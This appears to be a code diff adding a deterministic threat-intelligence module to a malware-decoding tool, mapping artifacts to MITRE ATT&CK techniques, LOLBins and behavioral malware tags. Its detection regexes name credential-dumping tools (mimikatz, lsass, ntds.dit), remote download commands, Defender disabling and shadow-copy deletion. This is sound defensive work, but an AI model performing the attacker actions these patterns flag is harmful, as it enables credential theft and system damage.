             "  <h2>Meta</h2>",
             f"  <pre>{esc(json.dumps(meta, indent=2))}</pre>",
             "  <h2>Indicators</h2>",
@@ -389,6 +404,110 @@ def _intelligence_html(intelligence: Dict[str, Any], esc) -> str:
             "  </section>",
         ]
     )
+
+
+def _normalize_threat_intelligence(value: Any) -> Dict[str, Any]:
+    if not isinstance(value, Mapping) or not value:
+        return {}
+    return {
+        "version": value.get("version"),
+        "catalog_version": value.get("catalog_version"),
+        "techniques": list(value.get("techniques") or []),
+        "tactics": list(value.get("tactics") or []),
+        "lolbins": list(value.get("lolbins") or []),
+        "malware_tags": list(value.get("malware_tags") or []),
+        "confidence": value.get("confidence"),
+        "summary": value.get("summary"),
+    }
+
+
+def _threat_markdown(threat: Dict[str, Any]) -> List[str]:
+    lines = [
+        "## Threat Intelligence",
+        "",
+        f"- **Confidence:** {_format_confidence(threat.get('confidence'))}",
+        f"- **Catalog:** {threat.get('catalog_version') or 'Unknown'}",
+        f"- **Summary:** {threat.get('summary') or 'None'}",
+        "",
+        "### MITRE ATT&CK",
+        "",
+    ]
+    techniques = threat.get("techniques") or []
+    if not techniques:
+        lines.append("- None")
+    else:
+        lines.append("| Technique | Name | Tactics | Confidence |")
+        lines.append("|---|---|---|---:|")
+        for item in techniques:
+            lines.append(
+                f"| {_md_cell(item.get('technique_id'))} | "
+                f"{_md_cell(item.get('name'))} | "
+                f"{_md_cell(', '.join(item.get('tactics') or []))} | "
+                f"{_format_confidence(item.get('confidence'))} |"
+            )
+    lines.extend(["", "### LOLBins", ""])
+    lolbins = threat.get("lolbins") or []
+    if not lolbins:
+        lines.append("- None")
+    else:
+        for item in lolbins:
+            lines.append(
+                f"- **{item.get('executable')}** — "
+                f"{', '.join(item.get('technique_ids') or [])} "
+                f"({_format_confidence(item.get('confidence'))})"
+            )
+    lines.extend(["", "### Behavioral Malware Tags", ""])
+    tags = threat.get("malware_tags") or []
+    if not tags:
+        lines.append("- None")
+    else:
+        for item in tags:
+            lines.append(
+                f"- **{item.get('tag')}** ({item.get('category')}, "
+                f"{_format_confidence(item.get('confidence'))}): "
+                f"{'; '.join(item.get('reasons') or [])}"
+            )
+    lines.append("")
+    return lines
+
+
+def _threat_html(threat: Dict[str, Any], esc) -> str:
+    rows = []
+    for item in threat.get("techniques") or []:
+        rows.append(
+            "<tr>"
+            f"<td><code>{esc(item.get('technique_id'))}</code></td>"
+            f"<td>{esc(item.get('name'))}</td>"
+            f"<td>{esc(', '.join(item.get('tactics') or []))}</td>"
+            f"<td>{esc(_format_confidence(item.get('confidence')))}</td>"
+            "</tr>"
+        )
+    if not rows:
+        rows.append("<tr><td colspan='4'><em>None</em></td></tr>")
+    lolbins = "".join(
+        f"<li><strong>{esc(item.get('executable'))}</strong> — "
+        f"{esc(', '.join(item.get('technique_ids') or []))}</li>"
+        for item in threat.get("lolbins") or []
+    ) or "<li>None</li>"
+    tags = "".join(
+        f"<li><strong>{esc(item.get('tag'))}</strong> "
+        f"({esc(item.get('category'))})</li>"
+        for item in threat.get("malware_tags") or []
+    ) or "<li>None</li>"
+    return "\n".join([
+        "  <section id='threat-intelligence'>",
+        "    <h2>Threat Intelligence</h2>",
+        f"    <p><strong>Confidence:</strong> {esc(_format_confidence(threat.get('confidence')))}</p>",
+        f"    <p>{esc(threat.get('summary') or '')}</p>",
+        "    <h3>MITRE ATT&CK</h3>",
+        "    <table><thead><tr><th>Technique</th><th>Name</th><th>Tactics</th><th>Confidence</th></tr></thead>",
+        f"    <tbody>{''.join(rows)}</tbody></table>",
+        "    <h3>LOLBins</h3>",
+        f"    <ul>{lolbins}</ul>",
+        "    <h3>Behavioral Malware Tags</h3>",
+        f"    <ul>{tags}</ul>",
+        "  </section>",
+    ])
 
 
 def _format_confidence(value: Any) -> str:

--- a/titan_decoder/core/detection_rules.py
+++ b/titan_decoder/core/detection_rules.py
@@ -6,7 +6,7 @@ graph and IOCs to flag suspicious patterns commonly seen in malware.
 
 from __future__ import annotations
 
-from typing import Dict, Any, List, Callable
+from typing import Dict, Any, List, Callable, Sequence
 import logging
 from pathlib import Path
 
@@ -23,12 +23,17 @@ class DetectionRule:
         description: str,
         severity: str,
         detect_fn: Callable,
+        attack_ids: Sequence[str] | None = None,
     ):
         self.rule_id = rule_id
         self.name = name
         self.description = description
         self.severity = severity  # low, medium, high, critical
         self.detect_fn = detect_fn
+        # MITRE ATT&CK technique IDs this rule indicates. Static metadata:
+        # consumed by the Threat Intelligence Engine as corroborating
+        # detection evidence (see docs/THREAT_INTELLIGENCE.md).
+        self.attack_ids = [str(t) for t in (attack_ids or [])]
 
     def evaluate(self, report: Dict[str, Any], iocs: Dict[str, Any]) -> bool:
         """Evaluate the rule against a report."""
@@ -80,6 +85,9 @@ class CorrelationRulesEngine:
                 severity = str(rule_def.get("severity") or "low").lower()
                 if severity not in {"low", "medium", "high", "critical"}:
                     severity = "low"
+                attack_ids = rule_def.get("attack_ids")
+                if not isinstance(attack_ids, list):
+                    attack_ids = []
 
                 # Closure captures rule_def + pack info.
                 def _fn(report, iocs, _rule_def=rule_def):
@@ -91,6 +99,7 @@ class CorrelationRulesEngine:
                     description=desc,
                     severity=severity,
                     detect_fn=_fn,
+                    attack_ids=[str(t) for t in attack_ids if t],
                 )
                 # Attach provenance for reporting.
                 setattr(
@@ -116,6 +125,7 @@ class CorrelationRulesEngine:
                 description="Multiple layers of Base64 encoding detected (3+ levels)",
                 severity="medium",
                 detect_fn=lambda report, iocs: self._detect_deep_base64(report),
+                attack_ids=["T1027"],
             )
         )
 
@@ -129,6 +139,7 @@ class CorrelationRulesEngine:
                 detect_fn=lambda report, iocs: self._detect_office_macro_network(
                     report, iocs
                 ),
+                attack_ids=["T1059.005", "T1204.002"],
             )
         )
 
@@ -140,6 +151,10 @@ class CorrelationRulesEngine:
                 description="Content suggests legitimate binary executing scripts",
                 severity="medium",
                 detect_fn=lambda report, iocs: self._detect_lolbin_pattern(report),
+                # Parent techniques: the rule fires on any LOLBin + abuse
+                # context, so sub-technique attribution is left to the Threat
+                # Intelligence Engine's per-binary LOLBin findings.
+                attack_ids=["T1059", "T1218"],
             )
         )
 
@@ -151,6 +166,7 @@ class CorrelationRulesEngine:
                 description="High entropy data with minimal successful decoding",
                 severity="low",
                 detect_fn=lambda report, iocs: self._detect_encrypted_payload(report),
+                attack_ids=["T1027"],
             )
         )
 
@@ -164,6 +180,7 @@ class CorrelationRulesEngine:
                 detect_fn=lambda report, iocs: self._detect_multistage_infra(
                     report, iocs
                 ),
+                attack_ids=["T1105"],
             )
         )
 
@@ -177,6 +194,7 @@ class CorrelationRulesEngine:
                 detect_fn=lambda report, iocs: self._detect_xor_with_network(
                     report, iocs
                 ),
+                attack_ids=["T1027", "T1105"],
             )
         )
 
@@ -188,6 +206,7 @@ class CorrelationRulesEngine:
                 description="PDF containing PE or executable-like content",
                 severity="critical",
                 detect_fn=lambda report, iocs: self._detect_malicious_pdf(report),
+                attack_ids=["T1204.002"],
             )
         )
 
@@ -376,6 +395,7 @@ class CorrelationRulesEngine:
                         "name": rule.name,
                         "description": rule.description,
                         "severity": rule.severity,
+                        "attack_ids": list(rule.attack_ids),
                         "source": source,
                     }
                 )

--- a/titan_decoder/core/graph_export.py
+++ b/titan_decoder/core/graph_export.py
@@ -37,11 +37,14 @@ class GraphExporter:
         self,
         nodes: List[Dict[str, Any]],
         intelligence: Mapping[str, Any] | None = None,
+        threat_intelligence: Mapping[str, Any] | None = None,
     ):
         self.nodes = nodes
         self.node_map = {node["id"]: node for node in nodes}
         self.intelligence = dict(intelligence or {})
+        self.threat_intelligence = dict(threat_intelligence or {})
         self._artifact_annotations = self._build_artifact_annotations()
+        self._threat_annotations = self._build_threat_annotations()
 
     def to_json(self, include_metadata: bool = True) -> str:
         """Export graph as JSON.
@@ -65,6 +68,9 @@ class GraphExporter:
             summary = self._intelligence_summary()
             if summary:
                 metadata["intelligence"] = summary
+            threat_summary = self._threat_summary()
+            if threat_summary:
+                metadata["threat_intelligence"] = threat_summary
             graph_data["metadata"] = metadata
 
         return json.dumps(graph_data, indent=2, default=str)
@@ -98,6 +104,7 @@ class GraphExporter:
             content_type = node.get("content_type", "Unknown")
             length = node.get("decoded_length", node.get("source_length", 0))
             annotation = self._artifact_annotations.get(node["id"])
+            threat = self._threat_annotations.get(node["id"])
 
             color = self._get_node_color(
                 content_type,
@@ -130,6 +137,21 @@ class GraphExporter:
                 )
                 attrs[0] = f'label="{dot_annotated_label}"' 
                 attrs.append('penwidth="2.5"')
+
+            if threat:
+                extra = []
+                if threat.get("technique_ids"):
+                    extra.append("ATT&CK: " + ", ".join(threat["technique_ids"]))
+                if threat.get("lolbins"):
+                    extra.append("LOLBins: " + ", ".join(threat["lolbins"]))
+                if threat.get("malware_tags"):
+                    extra.append("Tags: " + ", ".join(threat["malware_tags"]))
+                if extra:
+                    extra_label = self._dot_escape("\n".join(extra)).replace(
+                        "\n", r"\n"
+                    )
+                    current = attrs[0][len('label="') : -1]
+                    attrs[0] = f'label="{current}\\n{extra_label}"'
 
             lines.append(f"  {node_id} [{', '.join(attrs)}];")
 
@@ -165,6 +187,7 @@ class GraphExporter:
             content_type = self._mermaid_text(node.get("content_type", "Unknown"))
             score = self._safe_float(node.get("decode_score"))
             annotation = self._artifact_annotations.get(node["id"])
+            threat = self._threat_annotations.get(node["id"])
 
             label = f"{method}<br/>{content_type}<br/>Decode: {score:.3f}"
             if annotation:
@@ -175,6 +198,20 @@ class GraphExporter:
                 )
                 if reasons:
                     label += f"<br/>{self._mermaid_text(reasons)}"
+
+            if threat:
+                if threat.get("technique_ids"):
+                    label += "<br/>ATT&CK: " + self._mermaid_text(
+                        ", ".join(threat["technique_ids"])
+                    )
+                if threat.get("lolbins"):
+                    label += "<br/>LOLBins: " + self._mermaid_text(
+                        ", ".join(threat["lolbins"])
+                    )
+                if threat.get("malware_tags"):
+                    label += "<br/>Tags: " + self._mermaid_text(
+                        ", ".join(threat["malware_tags"])
+                    )
 
             open_b, close_b = self._get_mermaid_brackets(
                 content_type,
@@ -223,6 +260,9 @@ class GraphExporter:
         annotation = self._artifact_annotations.get(node.get("id"))
         if annotation:
             result["intelligence"] = dict(annotation)
+        threat = self._threat_annotations.get(node.get("id"))
+        if threat:
+            result["threat_intelligence"] = dict(threat)
         return result
 
     def _build_artifact_annotations(self) -> Dict[Any, Dict[str, Any]]:
@@ -248,6 +288,89 @@ class GraphExporter:
                 "artifact_name": artifact.get("artifact_name"),
             }
         return annotations
+
+    def _build_threat_annotations(self) -> Dict[Any, Dict[str, Any]]:
+        annotations: Dict[Any, Dict[str, Any]] = {}
+
+        def ensure(node_id):
+            if node_id not in self.node_map:
+                return None
+            return annotations.setdefault(
+                node_id,
+                {"technique_ids": [], "lolbins": [], "malware_tags": []},
+            )
+
+        for technique in self.threat_intelligence.get("techniques") or []:
+            if not isinstance(technique, Mapping):
+                continue
+            technique_id = str(technique.get("technique_id") or "")
+            for evidence in technique.get("evidence") or []:
+                if not isinstance(evidence, Mapping):
+                    continue
+                node_ids = []
+                if evidence.get("node_id") is not None:
+                    node_ids.append(evidence.get("node_id"))
+                node_ids.extend(evidence.get("node_ids") or [])
+                for node_id in node_ids:
+                    target = ensure(node_id)
+                    if target is not None and technique_id:
+                        target["technique_ids"].append(technique_id)
+
+        for lolbin in self.threat_intelligence.get("lolbins") or []:
+            if not isinstance(lolbin, Mapping):
+                continue
+            executable = str(lolbin.get("executable") or "")
+            for node_id in lolbin.get("node_ids") or []:
+                target = ensure(node_id)
+                if target is not None and executable:
+                    target["lolbins"].append(executable)
+
+        for tag in self.threat_intelligence.get("malware_tags") or []:
+            if not isinstance(tag, Mapping):
+                continue
+            name = str(tag.get("tag") or "")
+            for node_id in tag.get("node_ids") or []:
+                target = ensure(node_id)
+                if target is not None and name:
+                    target["malware_tags"].append(name)
+
+        for item in annotations.values():
+            for key in item:
+                item[key] = sorted(set(item[key]))
+        return annotations
+
+    def _threat_summary(self) -> Dict[str, Any]:
+        if not self.threat_intelligence:
+            return {}
+        return {
+            "version": self.threat_intelligence.get("version"),
+            "catalog_version": self.threat_intelligence.get("catalog_version"),
+            "confidence": self._safe_float(
+                self.threat_intelligence.get("confidence")
+            ),
+            "technique_ids": sorted({
+                str(item.get("technique_id"))
+                for item in self.threat_intelligence.get("techniques") or []
+                if isinstance(item, Mapping) and item.get("technique_id")
+            }),
+            "tactics": sorted(
+                str(item)
+                for item in self.threat_intelligence.get("tactics") or []
+            ),
+            "lolbins": sorted({
+                str(item.get("executable"))
+                for item in self.threat_intelligence.get("lolbins") or []
+                if isinstance(item, Mapping) and item.get("executable")
+            }),
+            "malware_tags": sorted({
+                str(item.get("tag"))
+                for item in self.threat_intelligence.get("malware_tags") or []
+                if isinstance(item, Mapping) and item.get("tag")
+            }),
+            "annotated_node_count": len(self._threat_annotations),
+            "summary": self.threat_intelligence.get("summary"),
+        }
+
 
     def _intelligence_summary(self) -> Dict[str, Any]:
         if not self.intelligence:

--- a/titan_decoder/core/rule_packs.py
+++ b/titan_decoder/core/rule_packs.py
@@ -16,10 +16,17 @@ rules:
     type: "content_regex"
     pattern: "powershell"
     flags: ["IGNORECASE"]
+    attack_ids: ["T1059.001"]
 
 Supported rule types:
 - content_regex: regex over concatenated node content_preview
 - ioc_present: requires one or more IOC types to meet minimum counts
+
+Optional per-rule metadata:
+- attack_ids: MITRE ATT&CK technique IDs the rule indicates. Carried on
+  triggered detections and consumed by the Threat Intelligence Engine as
+  corroborating evidence (IDs must exist in the bundled ATT&CK catalog to be
+  reported there).
 
 Security note
 -------------

--- a/titan_decoder/threat_intel/__init__.py
+++ b/titan_decoder/threat_intel/__init__.py
@@ -1,0 +1,12 @@
+"""Deterministic threat-intelligence subsystem for Titan Decoder Engine."""
+
+from .engine import ThreatIntelligenceEngine
+from .models import AttackTechniqueFinding, LOLBinFinding, MalwareTag, ThreatAssessment
+
+__all__ = [
+    "ThreatIntelligenceEngine",
+    "AttackTechniqueFinding",
+    "LOLBinFinding",
+    "MalwareTag",
+    "ThreatAssessment",
+]

--- a/titan_decoder/threat_intel/catalog.py
+++ b/titan_decoder/threat_intel/catalog.py
@@ -1,0 +1,20 @@
+"""Local MITRE ATT&CK catalog access."""
+
+from __future__ import annotations
+
+import json
+from functools import lru_cache
+from pathlib import Path
+from typing import Any, Dict
+
+
+@lru_cache(maxsize=1)
+def load_attack_catalog() -> Dict[str, Any]:
+    path = Path(__file__).with_name("data") / "attack_catalog.json"
+    data = json.loads(path.read_text(encoding="utf-8"))
+    data["by_id"] = {
+        str(item["id"]): item
+        for item in (data.get("techniques") or [])
+        if isinstance(item, dict) and item.get("id")
+    }
+    return data

--- a/titan_decoder/threat_intel/data/attack_catalog.json
+++ b/titan_decoder/threat_intel/data/attack_catalog.json
@@ -1,0 +1,148 @@
+{
+  "catalog_version": "enterprise-2026.1-titan-subset",
+  "techniques": [
+    {
+      "id": "T1059.001",
+      "name": "PowerShell",
+      "tactics": [
+        "execution"
+      ]
+    },
+    {
+      "id": "T1059.003",
+      "name": "Windows Command Shell",
+      "tactics": [
+        "execution"
+      ]
+    },
+    {
+      "id": "T1059.005",
+      "name": "Visual Basic",
+      "tactics": [
+        "execution"
+      ]
+    },
+    {
+      "id": "T1059.007",
+      "name": "JavaScript/JScript",
+      "tactics": [
+        "execution"
+      ]
+    },
+    {
+      "id": "T1105",
+      "name": "Ingress Tool Transfer",
+      "tactics": [
+        "command-and-control"
+      ]
+    },
+    {
+      "id": "T1027",
+      "name": "Obfuscated Files or Information",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1140",
+      "name": "Deobfuscate/Decode Files or Information",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1218.005",
+      "name": "Mshta",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1218.010",
+      "name": "Regsvr32",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1218.011",
+      "name": "Rundll32",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1218.007",
+      "name": "Msiexec",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1218.004",
+      "name": "InstallUtil",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1053.005",
+      "name": "Scheduled Task/Job: Scheduled Task",
+      "tactics": [
+        "execution",
+        "persistence",
+        "privilege-escalation"
+      ]
+    },
+    {
+      "id": "T1547.001",
+      "name": "Registry Run Keys / Startup Folder",
+      "tactics": [
+        "persistence",
+        "privilege-escalation"
+      ]
+    },
+    {
+      "id": "T1003",
+      "name": "OS Credential Dumping",
+      "tactics": [
+        "credential-access"
+      ]
+    },
+    {
+      "id": "T1082",
+      "name": "System Information Discovery",
+      "tactics": [
+        "discovery"
+      ]
+    },
+    {
+      "id": "T1083",
+      "name": "File and Directory Discovery",
+      "tactics": [
+        "discovery"
+      ]
+    },
+    {
+      "id": "T1047",
+      "name": "Windows Management Instrumentation",
+      "tactics": [
+        "execution"
+      ]
+    },
+    {
+      "id": "T1562.001",
+      "name": "Impair Defenses: Disable or Modify Tools",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1486",
+      "name": "Data Encrypted for Impact",
+      "tactics": [
+        "impact"
+      ]
+    }
+  ]
+}

--- a/titan_decoder/threat_intel/data/attack_catalog.json
+++ b/titan_decoder/threat_intel/data/attack_catalog.json
@@ -1,6 +1,89 @@
 {
-  "catalog_version": "enterprise-2026.1-titan-subset-r2",
+  "catalog_version": "enterprise-2026.1-titan-subset-r3",
   "techniques": [
+    {
+      "id": "T1003",
+      "name": "OS Credential Dumping",
+      "tactics": [
+        "credential-access"
+      ]
+    },
+    {
+      "id": "T1003.001",
+      "name": "OS Credential Dumping: LSASS Memory",
+      "tactics": [
+        "credential-access"
+      ]
+    },
+    {
+      "id": "T1016",
+      "name": "System Network Configuration Discovery",
+      "tactics": [
+        "discovery"
+      ]
+    },
+    {
+      "id": "T1027",
+      "name": "Obfuscated Files or Information",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1033",
+      "name": "System Owner/User Discovery",
+      "tactics": [
+        "discovery"
+      ]
+    },
+    {
+      "id": "T1036",
+      "name": "Masquerading",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1047",
+      "name": "Windows Management Instrumentation",
+      "tactics": [
+        "execution"
+      ]
+    },
+    {
+      "id": "T1053.002",
+      "name": "Scheduled Task/Job: At",
+      "tactics": [
+        "execution",
+        "persistence",
+        "privilege-escalation"
+      ]
+    },
+    {
+      "id": "T1053.003",
+      "name": "Scheduled Task/Job: Cron",
+      "tactics": [
+        "execution",
+        "persistence",
+        "privilege-escalation"
+      ]
+    },
+    {
+      "id": "T1053.005",
+      "name": "Scheduled Task/Job: Scheduled Task",
+      "tactics": [
+        "execution",
+        "persistence",
+        "privilege-escalation"
+      ]
+    },
+    {
+      "id": "T1057",
+      "name": "Process Discovery",
+      "tactics": [
+        "discovery"
+      ]
+    },
     {
       "id": "T1059",
       "name": "Command and Scripting Interpreter",
@@ -23,8 +106,22 @@
       ]
     },
     {
+      "id": "T1059.004",
+      "name": "Unix Shell",
+      "tactics": [
+        "execution"
+      ]
+    },
+    {
       "id": "T1059.005",
       "name": "Visual Basic",
+      "tactics": [
+        "execution"
+      ]
+    },
+    {
+      "id": "T1059.006",
+      "name": "Python",
       "tactics": [
         "execution"
       ]
@@ -37,6 +134,41 @@
       ]
     },
     {
+      "id": "T1070.004",
+      "name": "Indicator Removal: File Deletion",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1071",
+      "name": "Application Layer Protocol",
+      "tactics": [
+        "command-and-control"
+      ]
+    },
+    {
+      "id": "T1082",
+      "name": "System Information Discovery",
+      "tactics": [
+        "discovery"
+      ]
+    },
+    {
+      "id": "T1083",
+      "name": "File and Directory Discovery",
+      "tactics": [
+        "discovery"
+      ]
+    },
+    {
+      "id": "T1087",
+      "name": "Account Discovery",
+      "tactics": [
+        "discovery"
+      ]
+    },
+    {
       "id": "T1105",
       "name": "Ingress Tool Transfer",
       "tactics": [
@@ -44,8 +176,15 @@
       ]
     },
     {
-      "id": "T1027",
-      "name": "Obfuscated Files or Information",
+      "id": "T1112",
+      "name": "Modify Registry",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1127.001",
+      "name": "Trusted Developer Utilities: MSBuild",
       "tactics": [
         "defense-evasion"
       ]
@@ -55,6 +194,20 @@
       "name": "Deobfuscate/Decode Files or Information",
       "tactics": [
         "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1202",
+      "name": "Indirect Command Execution",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1204",
+      "name": "User Execution",
+      "tactics": [
+        "execution"
       ]
     },
     {
@@ -72,8 +225,50 @@
       ]
     },
     {
+      "id": "T1218.001",
+      "name": "Compiled HTML File",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1218.003",
+      "name": "CMSTP",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1218.004",
+      "name": "InstallUtil",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
       "id": "T1218.005",
       "name": "Mshta",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1218.007",
+      "name": "Msiexec",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1218.008",
+      "name": "Odbcconf",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1218.009",
+      "name": "Regsvcs/Regasm",
       "tactics": [
         "defense-evasion"
       ]
@@ -93,24 +288,30 @@
       ]
     },
     {
-      "id": "T1218.007",
-      "name": "Msiexec",
+      "id": "T1486",
+      "name": "Data Encrypted for Impact",
       "tactics": [
-        "defense-evasion"
+        "impact"
       ]
     },
     {
-      "id": "T1218.004",
-      "name": "InstallUtil",
+      "id": "T1489",
+      "name": "Service Stop",
       "tactics": [
-        "defense-evasion"
+        "impact"
       ]
     },
     {
-      "id": "T1053.005",
-      "name": "Scheduled Task/Job: Scheduled Task",
+      "id": "T1490",
+      "name": "Inhibit System Recovery",
       "tactics": [
-        "execution",
+        "impact"
+      ]
+    },
+    {
+      "id": "T1543.003",
+      "name": "Create or Modify System Process: Windows Service",
+      "tactics": [
         "persistence",
         "privilege-escalation"
       ]
@@ -124,31 +325,10 @@
       ]
     },
     {
-      "id": "T1003",
-      "name": "OS Credential Dumping",
+      "id": "T1552.001",
+      "name": "Unsecured Credentials: Credentials In Files",
       "tactics": [
         "credential-access"
-      ]
-    },
-    {
-      "id": "T1082",
-      "name": "System Information Discovery",
-      "tactics": [
-        "discovery"
-      ]
-    },
-    {
-      "id": "T1083",
-      "name": "File and Directory Discovery",
-      "tactics": [
-        "discovery"
-      ]
-    },
-    {
-      "id": "T1047",
-      "name": "Windows Management Instrumentation",
-      "tactics": [
-        "execution"
       ]
     },
     {
@@ -159,10 +339,10 @@
       ]
     },
     {
-      "id": "T1486",
-      "name": "Data Encrypted for Impact",
+      "id": "T1566.001",
+      "name": "Phishing: Spearphishing Attachment",
       "tactics": [
-        "impact"
+        "initial-access"
       ]
     }
   ]

--- a/titan_decoder/threat_intel/data/attack_catalog.json
+++ b/titan_decoder/threat_intel/data/attack_catalog.json
@@ -1,6 +1,13 @@
 {
-  "catalog_version": "enterprise-2026.1-titan-subset",
+  "catalog_version": "enterprise-2026.1-titan-subset-r2",
   "techniques": [
+    {
+      "id": "T1059",
+      "name": "Command and Scripting Interpreter",
+      "tactics": [
+        "execution"
+      ]
+    },
     {
       "id": "T1059.001",
       "name": "PowerShell",
@@ -46,6 +53,20 @@
     {
       "id": "T1140",
       "name": "Deobfuscate/Decode Files or Information",
+      "tactics": [
+        "defense-evasion"
+      ]
+    },
+    {
+      "id": "T1204.002",
+      "name": "User Execution: Malicious File",
+      "tactics": [
+        "execution"
+      ]
+    },
+    {
+      "id": "T1218",
+      "name": "System Binary Proxy Execution",
       "tactics": [
         "defense-evasion"
       ]

--- a/titan_decoder/threat_intel/engine.py
+++ b/titan_decoder/threat_intel/engine.py
@@ -1,0 +1,327 @@
+"""Threat Intelligence Engine v1."""
+
+from __future__ import annotations
+
+import re
+from collections import defaultdict
+from typing import Any, Dict, Iterable, List, Mapping, Sequence
+
+from .catalog import load_attack_catalog
+from .lolbins import identify_lolbins
+from .malware import identify_malware_tags
+from .models import AttackTechniqueFinding, ThreatAssessment
+
+
+class ThreatIntelligenceEngine:
+    """Map Titan evidence to deterministic ATT&CK, LOLBin, and malware tags."""
+
+    VERSION = "1.0"
+
+    BEHAVIOR_RULES = (
+        ("T1105", re.compile(r"(?i)\b(?:downloadstring|invoke-webrequest|curl|wget|urlretrieve)\b|https?://"), "network-transfer"),
+        ("T1027", re.compile(r"(?i)(?:\bfrombase64string\b|-enc(?:odedcommand)?\b|\b(?:base64|xor|gzip|deflate)\b)"), "obfuscation"),
+        ("T1140", re.compile(r"(?i)\b(?:frombase64string|convert\.frombase64|certutil\s+-decode|decompress|inflate)\b"), "decode"),
+        ("T1053.005", re.compile(r"(?i)\bschtasks(?:\.exe)?\b.*\/(?:create|run)\b"), "scheduled-task"),
+        ("T1547.001", re.compile(r"(?i)\breg(?:\.exe)?\s+add\b.*\\(?:run|runonce)\b"), "run-key"),
+        ("T1003", re.compile(r"(?i)\b(?:mimikatz|sekurlsa|lsass|ntds\.dit|sam\s+hive)\b"), "credential-access"),
+        ("T1082", re.compile(r"(?i)\b(?:systeminfo|hostname|wmic\s+os)\b"), "system-discovery"),
+        ("T1083", re.compile(r"(?i)\b(?:dir\s+\/s|Get-ChildItem|findstr)\b"), "file-discovery"),
+        ("T1562.001", re.compile(r"(?i)\b(?:set-mppreference|disableantispyware|stop-service\s+windefend|sc\s+stop)\b"), "impair-defenses"),
+        ("T1486", re.compile(r"(?i)\b(?:vssadmin\s+delete\s+shadows|wbadmin\s+delete\s+catalog|cipher\s+\/w:)\b"), "impact"),
+    )
+
+    def analyze(
+        self,
+        report: Mapping[str, Any],
+        iocs: Mapping[str, Sequence[Any]] | None = None,
+        detections: Sequence[Mapping[str, Any]] | None = None,
+    ) -> Dict[str, Any]:
+        nodes = [
+            item
+            for item in (report.get("nodes") or [])
+            if isinstance(item, Mapping)
+        ]
+        iocs = iocs or report.get("iocs") or {}
+        detections = list(
+            detections
+            if detections is not None
+            else report.get("detections") or []
+        )
+
+        catalog = load_attack_catalog()
+        by_id = catalog["by_id"]
+        lolbins = identify_lolbins(nodes)
+        malware_tags = identify_malware_tags(nodes, lolbins, iocs)
+
+        evidence_by_technique: Dict[str, List[Dict[str, Any]]] = defaultdict(list)
+        rules_by_technique: Dict[str, List[str]] = defaultdict(list)
+
+        for finding in lolbins:
+            for technique_id in finding.technique_ids:
+                evidence_by_technique[technique_id].append(
+                    {
+                        "kind": "lolbin",
+                        "value": finding.executable,
+                        "node_ids": list(finding.node_ids),
+                    }
+                )
+                rules_by_technique[technique_id].append(
+                    f"lolbin:{finding.executable}"
+                )
+
+        for node in nodes:
+            text = self._node_text(node)
+            for technique_id, pattern, rule_name in self.BEHAVIOR_RULES:
+                if pattern.search(text):
+                    evidence_by_technique[technique_id].append(
+                        {
+                            "kind": "node",
+                            "node_id": node.get("id"),
+                            "preview": text[:160],
+                        }
+                    )
+                    rules_by_technique[technique_id].append(rule_name)
+
+        for detection in detections:
+            attack_ids = (
+                detection.get("attack_ids")
+                or detection.get("mitre_attack")
+                or []
+            )
+            if isinstance(attack_ids, str):
+                attack_ids = [attack_ids]
+            for technique_id in attack_ids:
+                if technique_id in by_id:
+                    evidence_by_technique[technique_id].append(
+                        {
+                            "kind": "detection",
+                            "detection_id": detection.get("id"),
+                            "name": detection.get("name"),
+                        }
+                    )
+                    rules_by_technique[technique_id].append(
+                        "detection-metadata"
+                    )
+
+        techniques: List[AttackTechniqueFinding] = []
+        for technique_id in sorted(evidence_by_technique):
+            catalog_item = by_id.get(technique_id)
+            if not catalog_item:
+                continue
+            evidence = self._deduplicate_evidence(
+                evidence_by_technique[technique_id]
+            )
+            source_rules = sorted(
+                set(rules_by_technique[technique_id])
+            )
+            techniques.append(
+                AttackTechniqueFinding(
+                    technique_id=technique_id,
+                    name=str(catalog_item["name"]),
+                    tactics=list(catalog_item.get("tactics") or []),
+                    confidence=self._finding_confidence(
+                        evidence, source_rules
+                    ),
+                    evidence=evidence,
+                    source_rules=source_rules,
+                )
+            )
+
+        techniques.sort(
+            key=lambda item: (-item.confidence, item.technique_id)
+        )
+        tactics = sorted(
+            {tactic for item in techniques for tactic in item.tactics}
+        )
+        relationships = self._relationships(
+            techniques, lolbins, malware_tags
+        )
+        confidence = self._assessment_confidence(
+            techniques, lolbins, malware_tags
+        )
+
+        assessment = ThreatAssessment(
+            version=self.VERSION,
+            catalog_version=str(
+                catalog.get("catalog_version") or "unknown"
+            ),
+            techniques=techniques,
+            tactics=tactics,
+            lolbins=lolbins,
+            malware_tags=malware_tags,
+            relationships=relationships,
+            confidence=confidence,
+            summary=self._summary(
+                techniques, lolbins, malware_tags
+            ),
+        )
+        return assessment.to_dict()
+
+    @staticmethod
+    def _node_text(node: Mapping[str, Any]) -> str:
+        return " ".join(
+            str(node.get(key) or "")
+            for key in (
+                "content_preview",
+                "preview",
+                "artifact_name",
+                "method",
+                "decoder_used",
+            )
+        )
+
+    @staticmethod
+    def _deduplicate_evidence(
+        items: Iterable[Mapping[str, Any]],
+    ) -> List[Dict[str, Any]]:
